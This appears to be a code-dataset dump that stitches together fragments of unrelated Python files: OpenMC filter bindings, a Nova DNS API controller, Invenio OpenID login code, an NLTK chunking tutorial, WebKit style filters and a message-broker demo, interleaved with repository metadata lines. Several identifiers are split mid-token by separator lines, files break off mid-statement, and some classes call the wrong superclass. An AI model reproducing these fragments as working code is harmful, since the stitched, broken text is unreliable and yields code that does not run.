_dll.openmc_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_material_filter_get_bins.argtypes = [
c_int32, POINTER(POINTER(c_int32)), POINTER(c_size_t)]
_dll.openmc_material_filter_get_bins.restype = c_int
_dll.openmc_material_filter_get_bins.errcheck = _error_handler
_dll.openmc_material_filter_set_bins.argtypes = [c_int32, c_size_t, POINTER(c_int32)]
_dll.openmc_material_filter_set_bins.restype = c_int
_dll.openmc_material_filter_set_bins.errcheck = _error_handler
_dll.openmc_mesh_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_mesh_filter_get_mesh.restype = c_int
_dll.openmc_mesh_filter_get_mesh.errcheck = _error_handler
_dll.openmc_mesh_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_mesh_filter_set_mesh.restype = c_int
_dll.openmc_mesh_filter_set_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_meshsurface_filter_get_mesh.restype = c_int
_dll.openmc_meshsurface_filter_get_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_meshsurface_filter_set_mesh.restype = c_int
_dll.openmc_meshsurface_filter_set_mesh.errcheck = _error_handler
_dll.openmc_new_filter.argtypes = [c_char_p, POINTER(c_int32)]
_dll.openmc_new_filter.restype = c_int
_dll.openmc_new_filter.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_spatial_legendre_filter_get_order.restype = c_int
_dll.openmc_spatial_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_spatial_legendre_filter_set_order.restype = c_int
_dll.openmc_spatial_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_sphharm_filter_get_order.restype = c_int
_dll.openmc_sphharm_filter_get_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_sphharm_filter_set_order.restype = c_int
_dll.openmc_sphharm_filter_set_order.errcheck = _error_handler
_dll.openmc_zernike_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_zernike_filter_get_order.restype = c_int
_dll.openmc_zernike_filter_get_order.errcheck = _error_handler
_dll.openmc_zernike_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_zernike_filter_set_order.restype = c_int
_dll.openmc_zernike_filter_set_order.errcheck = _error_handler
_dll.tally_filters_size.restype = c_size_t
class Filter(_FortranObjectWithID):
__instances = WeakValueDictionary()
def __new__(cls, obj=None, uid=None, new=True, i
|
ndex=None):
mapping = filters
if index is None:
|
if new:
# Determine ID to assign
if uid is None:
uid = max(mapping, default=0) + 1
else:
if uid in mapping:
raise AllocationError('A filter with ID={} has already '
'been allocated.'.format(uid))
# Set the filter type -- note that the filter_type attribute
# only exists on subclasses!
index = c_int32()
_dll.openmc_new_filter(cls.filter_type.encode(), index)
index = index.value
else:
index = mapping[uid]._index
if index not in cls.__instances:
instance = super().__new__(cls)
instance._index = index
if uid is not None:
instance.id = uid
cls.__instances[index] = instance
return cls.__instances[index]
@property
def id(self):
filter_id = c_int32()
_dll.openmc_filter_get_id(self._index, filter_id)
return filter_id.value
@id.setter
def id(self, filter_id):
_dll.openmc_filter_set_id(self._index, filter_id)
class EnergyFilter(Filter):
filter_type = 'energy'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
energies = POINTER(c_double)()
n = c_size_t()
_dll.openmc_energy_filter_get_bins(self._index, energies, n)
return as_array(energies, (n.value,))
@bins.setter
def bins(self, bins):
# Get numpy array as a double*
energies = np.asarray(bins)
energies_p = energies.ctypes.data_as(POINTER(c_double))
_dll.openmc_energy_filter_set_bins(
self._index, len(energies), energies_p)
class EnergyoutFilter(EnergyFilter):
filter_type = 'energyout'
class AzimuthalFilter(Filter):
filter_type = 'azimuthal'
class CellFilter(Filter):
filter_type = 'cell'
@property
def bins(se
|
badock/nova
|
nova/api/openstack/compute/plugins/v3/floating_ip_dns.py
|
Python
|
apache-2.0
| 10,441 | 0.000958 |
# Copyright 2011 Andrew Bogott for the Wikimedia Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import urllib
i
|
mport webob
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import exception
from nova.i18n import _
from nova import network
from nova import utils
ALIAS = "os-floating-ip-dns"
authorize = extensions.extension_authorizer('compute', 'v3:'
|
+ ALIAS)
def _translate_dns_entry_view(dns_entry):
result = {}
result['ip'] = dns_entry.get('ip')
result['id'] = dns_entry.get('id')
result['type'] = dns_entry.get('type')
result['domain'] = dns_entry.get('domain')
result['name'] = dns_entry.get('name')
return {'dns_entry': result}
def _translate_dns_entries_view(dns_entries):
return {'dns_entries': [_translate_dns_entry_view(entry)['dns_entry']
for entry in dns_entries]}
def _translate_domain_entry_view(domain_entry):
result = {}
result['domain'] = domain_entry.get('domain')
result['scope'] = domain_entry.get('scope')
result['project'] = domain_entry.get('project')
result['availability_zone'] = domain_entry.get('availability_zone')
return {'domain_entry': result}
def _translate_domain_entries_view(domain_entries):
return {'domain_entries':
[_translate_domain_entry_view(entry)['domain_entry']
for entry in domain_entries]}
def _unquote_domain(domain):
"""Unquoting function for receiving a domain name in a URL.
Domain names tend to have .'s in them. Urllib doesn't quote dots,
but Routes tends to choke on them, so we need an extra level of
by-hand quoting here.
"""
return urllib.unquote(domain).replace('%2E', '.')
def _create_dns_entry(ip, name, domain):
return {'ip': ip, 'name': name, 'domain': domain}
def _create_domain_entry(domain, scope=None, project=None, av_zone=None):
return {'domain': domain, 'scope': scope, 'project': project,
'availability_zone': av_zone}
class FloatingIPDNSDomainController(object):
"""DNS domain controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSDomainController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors(501)
def index(self, req):
"""Return a list of available DNS domains."""
context = req.environ['nova.context']
authorize(context)
try:
domains = self.network_api.get_dns_domains(context)
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
domainlist = [_create_domain_entry(domain['domain'],
domain.get('scope'),
domain.get('project'),
domain.get('availability_zone'))
for domain in domains]
return _translate_domain_entries_view(domainlist)
@extensions.expected_errors((422, 501))
def update(self, req, id, body):
"""Add or modify domain entry."""
context = req.environ['nova.context']
authorize(context)
fqdomain = _unquote_domain(id)
try:
entry = body['domain_entry']
scope = entry['scope']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
project = entry.get('project', None)
av_zone = entry.get('availability_zone', None)
if (scope not in ('private', 'public') or
project and av_zone or
scope == 'private' and project or
scope == 'public' and av_zone):
raise webob.exc.HTTPUnprocessableEntity()
try:
if scope == 'private':
create_dns_domain = self.network_api.create_private_dns_domain
area_name, area = 'availability_zone', av_zone
else:
create_dns_domain = self.network_api.create_public_dns_domain
area_name, area = 'project', project
except NotImplementedError:
msg = _("Unable to create dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
create_dns_domain(context, fqdomain, area)
return _translate_domain_entry_view({'domain': fqdomain,
'scope': scope,
area_name: area})
@extensions.expected_errors((404, 501))
@wsgi.response(202)
def delete(self, req, id):
"""Delete the domain identified by id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(id)
# Delete the whole domain
try:
self.network_api.delete_dns_domain(context, domain)
except NotImplementedError:
msg = _("Unable to delete dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
class FloatingIPDNSEntryController(object):
"""DNS Entry controller for OpenStack API."""
def __init__(self):
super(FloatingIPDNSEntryController, self).__init__()
self.network_api = network.API()
@extensions.expected_errors((422, 404, 501))
def show(self, req, domain_id, id):
"""Return the DNS entry that corresponds to domain_id and id."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
floating_ip = None
# Check whether id is a valid ipv4/ipv6 address.
if utils.is_valid_ipv4(id) or utils.is_valid_ipv6(id):
floating_ip = id
try:
if floating_ip:
entries = self.network_api.get_dns_entries_by_address(context,
floating_ip,
domain)
else:
entries = self.network_api.get_dns_entries_by_name(context,
id,
domain)
except NotImplementedError:
msg = _("Unable to get dns domain")
raise webob.exc.HTTPNotImplemented(explanation=msg)
if not entries:
explanation = _("DNS entries not found.")
raise webob.exc.HTTPNotFound(explanation=explanation)
if floating_ip:
entrylist = [_create_dns_entry(floating_ip, entry, domain)
for entry in entries]
dns_entries = _translate_dns_entries_view(entrylist)
return wsgi.ResponseObject(dns_entries)
entry = _create_dns_entry(entries[0], id, domain)
return _translate_dns_entry_view(entry)
@extensions.expected_errors((422, 501))
def update(self, req, domain_id, id, body):
"""Add or modify dns entry."""
context = req.environ['nova.context']
authorize(context)
domain = _unquote_domain(domain_id)
name = id
try:
entry = body['dns_entry']
address = entry['ip']
dns_type = entry['dns_type']
except (TypeError, KeyError):
raise webob.exc.HTTPUnprocessableEntity()
try:
entries = self.network_api.get_dns_entries_by_name(context,
name,
|
Panos512/invenio
|
modules/webaccess/lib/external_authentication_openid.py
|
Python
|
gpl-2.0
| 6,658 | 0.004356 |
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2012 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
This module contains functions and methods to authenticate with OpenID
providers.
"""
__revision__ = \
"$Id$"
from invenio.config import CFG_SITE_SECURE_URL
from invenio.external_authentication import ExternalAuth
from invenio.session import get_session
class ExternalOpenID(ExternalAuth):
"""
Contains methods for authenticate with an OpenID provider.
"""
@staticmethod
def __init_req(req):
req.g['openid_provider_name'] = ''
req.g['openid_debug'] = 0
req.g['openid_msg'] = ''
req.g['openid_debug_msg'] = ''
req.g['openid_response'] = None
def auth_user(self, username, password, req=None):
"""
Tries to find email and OpenID identity of the user. If it
doesn't find any of them, returns (None, None)
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType, str|NoneType
"""
from openid.consumer import consumer
self._get_response(req)
response = req.g['openid_response']
identity = None
email = None
if response.status == consumer.SUCCESS:
# In the first login of the user, fetches his/her email
# from OpenID provider.
email = self._get_email_from_success_response(req)
identity = response.getDisplayIdentifier()
elif response.status == consumer.CANCEL:
# If user cancels the verification, set corresponding message.
req.openid_msg = 21
elif response.status == consumer.FAILURE:
# If verification fails, set corresponding message.
req.openid_msg.msg = 22
return email, identity
@staticmethod
def get_msg(req):
return req.g['openid_msg']
def fetch_user_nickname(self, username, password=None, req=None):
"""
Fetches the OpenID provider for nickname of the user. If it doesn't
find any, returns None.
This function doesn't need username, password or req. They are exist
just because this class is derived from ExternalAuth
@param username: Isn't used in this function
@type username: str
@param password: Isn't used in this function
@type password: str
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
@rtype: str|NoneType
"""
from openid.extensions import ax
from openid.extensions import sreg
nickname = None
# May be either Simple Registration (sreg) response or
# Attribute Exchange (ax) response.
sreg_resp = None
ax_resp = None
response = req.g['openid_response']
sreg_resp = sreg.SRegResponse.fromSuccessResponse(response)
if sreg_resp:
if sreg_resp.getExtensionArgs().has_key('nickname'):
nickname = sreg_res
|
p.getExtensionArgs()['nickname']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp and not nickname:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/namePerso
|
n/friendly':
nickname = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not nickname:
if extensions['type.ext1'] == \
'http://axschema.org/namePerson/friendly':
nickname = extensions['value.ext1.1']
return nickname
@staticmethod
def _get_email_from_success_response(req):
"""
Fetches the email from consumer.SuccessResponse. If it doesn't find any
returns None.
@rtype: str|NoneType
"""
from openid.extensions import ax
email = None
response = req.g['openid_response']
ax_resp = ax.FetchResponse.fromSuccessResponse(response)
if ax_resp:
extensions = ax_resp.getExtensionArgs()
if extensions.has_key('type.ext0') and \
extensions.has_key('value.ext0.1'):
if extensions['type.ext0'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext0.1']
if extensions.has_key('type.ext1') and \
extensions.has_key('value.ext1.1') and not email:
if extensions['type.ext1'] == \
'http://axschema.org/contact/email':
email = extensions['value.ext1.1']
return email
@staticmethod
def _get_response(req):
"""
Constructs the response returned from the OpenID provider
@param req: request
@type req: invenio.webinterface_handler_wsgi.SimulatedModPythonRequest
"""
from invenio.webinterface_handler import wash_urlargd
from openid.consumer import consumer
content = {}
for key in req.form.keys():
content[key] = (str, '')
args = wash_urlargd(req.form, content)
if args.has_key('ln'):
del args['ln']
if args.has_key('referer'):
if not args['referer']:
del args['referer']
oidconsumer = consumer.Consumer({"id": get_session(req)}, None)
url = CFG_SITE_SECURE_URL + "/youraccount/login"
req.g['openid_provider_name'] = args['provider']
req.g['openid_response'] = oidconsumer.complete(args, url)
|
DoWhatILove/turtle
|
programming/python/library/nltk/information_extraction.py
|
Python
|
mit
| 4,285 | 0.018203 |
#%%
# information extraction: getting meaning from text
import nltk, re, pprint
def preprocess(document):
sents = nltk.sent_tokenize(document)
sents = [nltk.word_tokenize(sent) for sent in sents]
sents = [nltk.pos_tag(sent) for sent in sents]
return sents
#%% chunking
# NP-chunking
# one of most useful sources of information for NP-chunking is POS tags
sentence = [("the", "DT"), ("little", "JJ"), ("yellow", "JJ"), ("dog", "NN"), ("barked", "VBD"), ("at", "IN"), ("the", "DT"), ("cat", "NN")]
grammar = "NP: {<DT>?<JJ>*<NN>}"
cp = nltk.RegexpParser(grammar)
result = cp.parse(sentence)
print(result)
result.draw()
#%%
from nltk.corpus import conll2000
print(conll2000.chunked_sents('train.txt')[99])
print(conll2000.chunked_sents('train.txt',chunk_types=['NP'])[99])
#%%
cp = nltk.RegexpParser("")
test_sents = conll2000.chunked_sents('test.txt',chunk_types=['NP'])
print(cp.evaluate(test_sents))
#%%
grammar = r"NP: {<[CDJNP].*>+}"
cp = nltk.RegexpParser(grammar)
print(cp.evaluate(test_sents))
#%%
class UnigramChunker(nltk.ChunkParserI):
def __init__(self,train_sents):
train_data = [[(t,c) for w,t,c in nltk.chunk.tree2conlltags(sent)] for sent in train_sents]
self.tagger = nltk.UnigramTagger(train_data)
def parse(self,sentence):
pos_tags = [pos for (word,pos) in sentence]
tagged_pos_tags = self.tagger.tag(pos_tags)
chunktags = [chunktag for (pos,chunktag) in tagged_pos_tags]
conlltags = [(word,pos,chunktag) for ((word,pos),chunktag) in zip(sentence,chunktags)]
return nltk.chunk.conlltags2tree(conlltags)
test_sents = conll2000.chunked_sents('test.txt', chunk_types=['NP'])
train_sents = conll2000.chunked_sents('train.txt',chunk_types=['NP'])
unigram_chunker = UnigramChunker(train_sents)
print(unigram_chunker.evaluate(test_sents))
#%% what learned
postags = sorted(set(pos for sent in train_sents
for (word,pos) in sent.leaves()))
print(unigram_chunker.tagger.tag(postags))
#%% classifier based chunker
# not only pos tag, but also word content
class ConsecutiveNPChunkTagger(nltk.TaggerI):
def __init__(self, train_sents):
train_set = []
for tagged_sent in train_sents:
untagged_sent = nltk.tag.untag(tagged_sent)
history = []
for i, (word, tag) in enumerate(tagged_sent):
featureset = npchunk_features(untagged_sent, i, history)
train_set.append( (featureset, tag) )
history.append(tag)
self.classifier = nltk.NaiveBayesClassifier.train(
train_set)
def tag(self, sentence):
history = []
for i, word in enumerate(sentence):
featureset = npchunk_features(sentence, i, history)
tag = self.classifier.classify(featureset)
history.append(tag)
return zip(sentence, history)
class ConsecutiveNPChunker(nltk.ChunkParserI):
def __init__(self, train_sents):
tagged_sents = [[((w,t),c) for (w,t,c) in
nltk.chunk.tree2conlltags(sent)]
for sent in train_sents]
self.tagger = ConsecutiveNPChunkTagger(tagged_sents)
def parse(self, sentence):
tagged_sents = self.tagger.tag(sentence)
conlltags = [(w,t,c) for ((w,t),c) in tagged_sents]
return nltk.chunk.conlltags2tree(conlltags)
#%%
def npchunk_features(sentence,i,history):
word,pos = sentence[i]
if i == 0:
prevword,prevpos = "<START>","<START>"
else:
prevword,prevpos = sentence[i-1]
if i == len(sentence)-1:
nextword,nextpos = "<END>","<END>"
else:
nextword,nextpos = sentence[i+1]
return {
"pos":pos,
"prevpos":prevpos,
"word":word,
"nextpos":nextpos,
"prevpos+pos":"%s+%s" % (prevpos,pos),
"pos+nextpos":"%s+%s" % (pos,nextpos),
"tags-since-dt":tags
|
_since_dt(sentence,i)}
def tags_since_dt(sentence,i):
tags = set()
for word,pos in sentence[:i]:
if pos == "DT":
tags = set()
else:
tags.add(pos)
return '+'.join(sorted(tags))
#%%
chunker = Consec
|
utiveNPChunker(train_sents)
print(chunker.evaluate(test_sents))
|
cattleprod/samsung-kernel-gt-i9100
|
external/webkit/WebKitTools/Scripts/webkitpy/style/filter.py
|
Python
|
gpl-2.0
| 11,910 | 0.00084 |
# Copyright (C) 2010 Chris Jerdonek (chris.jerdonek@gmail.com)
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains filter-related code."""
def validate_filter_rules(filter_rules, all_categories):
"""Validate the given filter rules, and raise a ValueError if not valid.
Args:
filter_rules: A list of boolean filter rules, for example--
["-whitespace", "+whitespace/braces"]
all_categories: A list of all available category names, for example--
["whitespace/tabs", "whitespace/braces"]
Raises:
ValueError: An error occurs if a filter rule does not begin
with "+" or "-" or if a filter rule does not match
the beginning of some category name in the list
of all available categories.
"""
for rule in filter_rules:
if not (rule.startswith('+') or rule.startswith('-')):
raise ValueError('Invalid filter rule "%s": every rule '
"must start with + or -." % rule)
for category in all_categories:
if category.startswith(rule[1:]):
break
else:
raise ValueError('Suspected incorrect filter rule "%s": '
"the rule does not match the beginning "
"of any category name." % rule)
class _CategoryFilter(object):
"""Filters whether to check style categories."""
def __init__(self, filter_rules=None):
"""Create a category filter.
Args:
filter_rules: A list of strings that are filter rules, which
are strings beginning with the plus or minus
symbol (+/-). The list should include any
default filter rules at the beginning.
Defaults to the empty list.
Raises:
ValueError: Invalid filter rule if a rule does not start with
plus ("+") or minus ("-").
"""
if filter_rules is None:
filter_rules = []
self._filter_rules = filter_rules
self._should_check_category = {} # Cached dictionary of category to True/False
def __str__(self):
return ",".join(self._filter_rules)
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this CategoryFilter
|
instance is equal to another."""
return self._filter_rules == other._filter_rules
# Useful for unit testing.
def __ne__(self, other):
# Python does not automatically deduce from __eq__().
return not (self == other)
def should_check(self, category):
"""Return whether the category should be checked.
The rules for determining whether a category should be checked
are as follows. By default all
|
categories should be checked.
Then apply the filter rules in order from first to last, with
later flags taking precedence.
A filter rule applies to a category if the string after the
leading plus/minus (+/-) matches the beginning of the category
name. A plus (+) means the category should be checked, while a
minus (-) means the category should not be checked.
"""
if category in self._should_check_category:
return self._should_check_category[category]
should_check = True # All categories checked by default.
for rule in self._filter_rules:
if not category.startswith(rule[1:]):
continue
should_check = rule.startswith('+')
self._should_check_category[category] = should_check # Update cache.
return should_check
class FilterConfiguration(object):
"""Supports filtering with path-specific and user-specified rules."""
def __init__(self, base_rules=None, path_specific=None, user_rules=None):
"""Create a FilterConfiguration instance.
Args:
base_rules: The starting list of filter rules to use for
processing. The default is the empty list, which
by itself would mean that all categories should be
checked.
path_specific: A list of (sub_paths, path_rules) pairs
that stores the path-specific filter rules for
appending to the base rules.
The "sub_paths" value is a list of path
substrings. If a file path contains one of the
substrings, then the corresponding path rules
are appended. The first substring match takes
precedence, i.e. only the first match triggers
an append.
The "path_rules" value is the tuple of filter
rules that can be appended to the base rules.
The value is a tuple rather than a list so it
can be used as a dictionary key. The dictionary
is for caching purposes in the implementation of
this class.
user_rules: A list of filter rules that is always appended
to the base rules and any path rules. In other
words, the user rules take precedence over the
everything. In practice, the user rules are
provided by the user from the command line.
"""
if base_rules is None:
base_rules = []
if path_specific is None:
path_specific = []
if user_rules is None:
user_rules = []
self._base_rules = base_rules
self._path_specific = path_specific
self._path_specific_lower = None
"""The backing store for self._get_path_specific_lower()."""
# FIXME: Make user rules internal after the FilterConfiguration
# attribute is removed from ProcessorOptions (since at
# that point ArgumentPrinter will no longer need to
# access FilterConfiguration.user_rules).
self.user_rules = user_rules
self._path_rules_to_filter = {}
"""Cached dictionary of path rules to CategoryFilter instance."""
# The same CategoryFilter instance can be shared across
# multiple keys in this dictionary. This allows us to take
# greater advantage of the caching done by
# CategoryFilter.should_check().
self._path_to_filter = {}
"""Cached dictionary of file path to CategoryFilter instance."""
# Useful for unit testing.
def __eq__(self, other):
"""Return whether this FilterConfiguration is equal to another."""
if self._base_rules != other._base_rules:
return False
if self._path_specific != other._path_sp
|
ted-dunstone/ivs
|
hub_demo/send_msg.py
|
Python
|
mit
| 11,161 | 0.021862 |
#!/usr/bin/env python
import sys
import os
import getopt
import time
import random
from messageQueue import MessageQueue
VERSION = 0.5
REQUEST_EXCHANGE = {"name":"Request", "ex_type":"headers"}
IDENTIFY_EXCHANGE = {"name":"Identify", "ex_type":"headers"}
RESULTS_EXCHANGE = {"name":"Results", "ex_type":"headers"}
TRANSFORM_EXCHANGE = {"name":"Transform", "ex_type":"headers"}
WEB_EXCHANGE = {"name":"Web", "ex_type":"headers"}
NIST_EXCHANGE = {"name":"NIST", "ex_type":"headers"}
SETTINGS_EXCHANGE = {'name':'settings','ex_type':'x-lvc'}
EXCHANGES = [REQUEST_EXCHANGE,IDENTIFY_EXCHANGE,RESULTS_EXCHANGE,TRANSFORM_EXCHANGE, WEB_EXCHANGE, NIST_EXCHANGE]
class MessageBrokerBase(MessageQueue):
# Base class
def __init__(self, node_name, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,routing_key='',settings=None):
super(MessageBrokerBase, self).__init__(node_name, user_id,settings=settings)
self.exchange = exchange_info
self.setup()
self.request_queue=self.queue_bind(self.exchange, header) #, routing_key)
self.log( 'starting '+self.__class__.__name__+' binding to '+exchange_info["name"])
def start(self, ):
self.start_consume(self.request_queue)
def local_exchage(self, ):
return {"name":self.node_name, "ex_type":"headers"}
def setup(self, ):
pass
#self.queue_name = self.channel.queue_declare( exclusive=False, queue = self.node_name).method.queue
# queue = "aa_"+self.node_name
class Broker(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = REQUEST_EXCHANGE,settings=None):
super(Broker, self).__init__("Broker", user_id,header, exchange_info,settings=settings)
def setup(self, ):
#setup the exchanges
super(Broker, self).setup()
for exchange in EXCHANGES:
self.channel.exchange_declare(exchange=exchange["name"], type=exchange["ex_type"])
def on_return_status(self, properties):
# called as RPC to return the status of a sent msg
return "[OK] from %s"%self.node_name
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
if 'filetype' in properties.headers:
import sys,re
import json
sys.path.append("..")
import modules.NISTutility as nu
#try:
|
filename = './output.eft'
filestr = re.search(r'base64,(.*)', json.loads(body)['file_content']).group(1)
output = open(filename, 'wb')
output.write(filestr.decode('base64'))
output.close()
NISTResult=nu.convertNIST(filename,'jpg','new_i'+filename)
self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
#except:
# self.send(WEB_EXCHANGE, "ERROR", properties.headers, False)
|
if 'setup' in properties.headers:
# Send the message back to the receiever
exchange = RESULTS_EXCHANGE
if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
body = "Exchange params"
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
else:
# Send the message onto the Identify Exchange
self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
class Transformer(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = TRANSFORM_EXCHANGE,settings=None):
super(Broker, self).__init__("Transformer", user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
self.send(IDENTIFY_EXCHANGE, body, properties.headers, False)
class NISTExtractor(MessageBrokerBase):
# the broker class - binds to the REQUEST_EXCHANGE sends to the IDENTIFY_EXCHANGE
def __init__(self, user_id="guest",header={},exchange_info = NIST_EXCHANGE,settings=None):
import sys
import json
sys.path.append("..")
import modules.NISTutility as nu
super(Broker, self).__init__("NISTExtractor", user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Broker,self).on_recieve_callback(ch, method, properties, body)
NISTResult=nu.convertNIST(eftname,'jpg','new_i'+eftname)
self.send(WEB_EXCHANGE, json.dumps(NISTResult), properties.headers, False)
class MsgLog(MessageQueue):
# the logging class - binds to the fire_host
def __init__(self, user_id="guest",header={},settings=None):
super(MsgLog, self).__init__("Logger", user_id,settings=settings)
self.channel.queue_declare(queue='firehose-queue', durable=False,auto_delete=True, exclusive=True)
self.request_queue=self.queue_bind({"name":"Results"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Web"},queue_name= 'firehose-queue', routing_key='#')
#self.request_queue=self.queue_bind({"name":"Request"},queue_name= 'firehose-queue', routing_key='#')
self.request_queue=self.queue_bind({"name":"Identify"},queue_name= 'firehose-queue', routing_key='#')
def on_recieve_callback(self, ch, method, properties, body):
#self.log(body)
if 'requester' in properties.headers:
self.log("from %s for %s to %s"%( properties.headers['requester'], properties.headers['destination']['name'], properties.headers['last_node']))
self.log(str(properties.user_id))
#else:
#self.log(str(properties)) body))
#self.log(str(method))
#self.log(str(
def start(self, ):
self.start_consume(self.request_queue)
class Matcher(MessageBrokerBase):
# the matcher class - binds to the IDENTIFY_EXCHANGE
# undertakes match and puts return on the RESULTS_EXCHANGE queue with the routing_key of the name
def __init__(self, node_name, user_id="guest",header={},exchange_info = IDENTIFY_EXCHANGE,settings=None):
header.update({"from_node":node_name})
super(Matcher, self).__init__(node_name, user_id,header, exchange_info,settings=settings)
def on_recieve_callback(self, ch, method, properties, body):
super(Matcher,self).on_recieve_callback(ch, method, properties, body)
self.log('Matching '+str(properties.headers))
if 'requester' in properties.headers and not(self.node_name == properties.headers['requester']): # make sure not to match our own request
body = "Match score = %f from %s"%(random.random(),self.node_name)
self.log("doing match - sending "+body)
exchange = RESULTS_EXCHANGE
if properties.headers['requester']=='Web':
exchange = WEB_EXCHANGE
self.log("my exchange is "+str(exchange))
self.send(exchange, body, properties.headers,routing_key=properties.headers['requester'])
class Requester(MessageQueue):
# the match request class - sends a request on the REQUEST_EXCHANGE
def __init__(self, node_name, user_id="guest",settings=None):
super(Requester, self).__init__(node_name, user_id,settings=settings)
def send(self, msg,header):
header.update({self.node_name:True,'requester':self.node_name})
super(Requester,self).send(REQUEST_EXCHANGE,msg,header,True)
class Receiver(MessageBrokerBase):
# retrieve the results from the RESULTS_EXCHANGE
def __init__(self, node_name, user_id="guest",header={},exchange_info = RESULTS_EXCHANGE,settings=None):
super(Receive
|
jmcfarlane/chula
|
chula/www/controller/__init__.py
|
Python
|
gpl-2.0
| 49 | 0 |
from chula.www.controller.b
|
ase import Controller
| |
zmathe/WebAppDIRAC
|
WebApp/handler/FileCatalogHandler.py
|
Python
|
gpl-3.0
| 12,082 | 0.048088 |
